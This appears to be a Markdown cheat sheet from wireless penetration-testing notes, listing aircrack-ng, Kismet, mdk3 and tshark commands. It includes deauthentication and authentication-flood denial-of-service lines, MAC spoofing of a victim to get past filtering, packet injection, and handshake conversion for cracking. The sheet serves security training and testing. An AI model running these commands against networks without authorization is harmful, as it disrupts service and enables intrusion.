122 lines
2.4 KiB
Markdown
122 lines
2.4 KiB
Markdown
# Wifi - Additional Tricks and Tools
|
||
|
||
## Additional Aircrack-NG Tools
|
||
|
||
### Remove Wireless Headers
|
||
|
||
```powershell
|
||
airdecap-ng -b $AP_MAC open-network.cap
|
||
* -dec.cap: stripped version of the file
|
||
```
|
||
|
||
### Decrypt a WEP encrypted capture file
|
||
|
||
```powershell
|
||
airdecap-ng -w $WEP_KEY wep.cap
|
||
```
|
||
|
||
### Decrypt a WPA2 encrypted capture file
|
||
|
||
```powershell
|
||
airdecap-ng -e $AP_SSID -p $WPA_PASSWORD tkip.cap
|
||
```
|
||
|
||
### Remote Aircrack Suite
|
||
|
||
```powershell
|
||
airmon-ng start wlan0 3
|
||
airserv-ng -p 1337 -c 3 -d mon0
|
||
airodump-ng -c 3 --bssid $AP_MAC $HOST:$PORT
|
||
```
|
||
|
||
### Wireless Intrusion Detection System
|
||
|
||
> Require wireless key and bssid
|
||
|
||
```powershell
|
||
airmon-ng start wlan0 3
|
||
|
||
# create the at0 interface
|
||
airtun-ng -a $AP_MAC -w $WEP_KEY mon0
|
||
# the interface will auto decrypt packets
|
||
```
|
||
|
||
## Wireless Reconnaissance
|
||
|
||
> Use CSV file from airodump
|
||
|
||
CAPR Graph
|
||
|
||
```powershell
|
||
airgraph-ng -i wifu-01.csv -g CAPR -o wifu-capr.png
|
||
# color
|
||
- green: wpa
|
||
- yellow: wep
|
||
- red: open
|
||
- black: unknown
|
||
```
|
||
|
||
CPG - Client Probe Graph
|
||
|
||
```powershell
|
||
airgraph-ng -i wifu-01.csv -g CPG -o wifu-cpg.png
|
||
```
|
||
|
||
## Kismet
|
||
|
||
```powershell
|
||
kismet
|
||
[enter][enter]
|
||
[tab][close]
|
||
|
||
# Select a source and begin a monitoring
|
||
Kismet > Add source > wlan0 > Add
|
||
|
||
.nettxt: data
|
||
.pcapdump: wireshark format
|
||
```
|
||
|
||
```powershell
|
||
# giskismet: kismet inside a SQL database
|
||
> require a GPS receiver
|
||
|
||
gpsd -n -N -D4 /dev/ttyUSB0
|
||
-N : foreground
|
||
-D : debugging level
|
||
|
||
# kismet will gather SSID and GPS location
|
||
giskismet -x kismet.netxml
|
||
|
||
# generate a kml file (Google Earth)
|
||
giskismet -q "select * from wireless" -o allaps.kml
|
||
giskismet -q "select * from wireless where Encryption='WEP'" -o wepaps.kml
|
||
```
|
||
|
||
## Other things
|
||
|
||
```powershell
|
||
# Find Hidden SSID
|
||
aireplay-ng -0 20 –a <BSSID> -c <VictimMac> mon0
|
||
|
||
# Mac Filtering
|
||
macchanger –-mac <VictimMac> wlan0mon
|
||
aireplay-ng -3 –b <BSSID> -h <FakedMac> wlan0mon
|
||
# MAC CHANGER
|
||
ifconfig wlan0mon down
|
||
macchanger –-mac <macVictima> wlan0mon
|
||
ifconfig wlan0mon up
|
||
|
||
# Deauth Global
|
||
aireplay-ng -0 0 -e hacklab -c FF:FF:FF:FF:FF:FF wlan0mon
|
||
|
||
# Authentication DoS Mode
|
||
mdk3 wlan0mon a -a $AP_MAC
|
||
|
||
# Tshark - Filter and dislay data
|
||
tshark -r Captura-02.cap -Y "eapol" 2>/dev/null
|
||
tshark -i wlan0mon -Y "wlan.fc.type_subtype==4" 2>/dev/null
|
||
tshark -r Captura-02.cap -Y "(wlan.fc.type_subtype==0x08 || wlan.fc.type_subtype==0x05 || eapol) && wlan.addr==20:34:fb:b1:c5:53" 2>/dev/null
|
||
|
||
# Convert .cap with handshake to .hccap
|
||
aircrack-ng -J network network.cap
|
||
``` |